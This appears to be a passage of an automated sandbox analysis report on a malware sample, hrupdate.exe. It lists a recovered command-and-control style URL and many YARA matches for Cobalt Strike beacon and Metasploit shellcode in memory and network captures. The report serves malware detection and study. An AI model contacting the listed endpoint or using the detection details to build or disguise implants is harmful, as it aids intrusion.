      Source: hrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlA
      Source: hrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlP
      Source: hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmla
      Source: hrupdate.exe, 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlg
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmloD
      Source: hrupdate.exe, 00000000.00000003.2166521732.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlp2
      Source: hrupdate.exe, 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlw
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/ss/portallogin-gettask.html
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/training.ro/rss/portallogin-gettask.htmlQG
      Source: unknown HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.4:49732 version: TLS 1.2

      System Summary

      Source: dump.pcap, type: PCAP Matched rule: Rule for beacon reflective loader Author: unknown
      Source: dump.pcap, type: PCAP Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: dump.pcap, type: PCAP Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: dump.pcap, type: PCAP Matched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: C:\Users\user\Desktop\hrupdate.exe Code function: 0_2_04FC7D88 GetLastError,CreateProcessWithLogonW,GetLastError,_memset,GetLastError, 0_2_04FC7D88
      Source: C:\Users\user\Desktop\hrupdate.exe Code function: 0_2_04FEC4E0 0_2_04FEC4E0
      Source: C:\Users\user\Desktop\hrupdate.exe Code function: 0_2_04FE05A6 0_2_04FE05A6
      Source: C:\Users\user\Desktop\hrupdate.exe Code function: 0_2_04FE99E8 0_2_04FE99E8
      Source: hrupdate.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: dump.pcap, type: PCAP Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
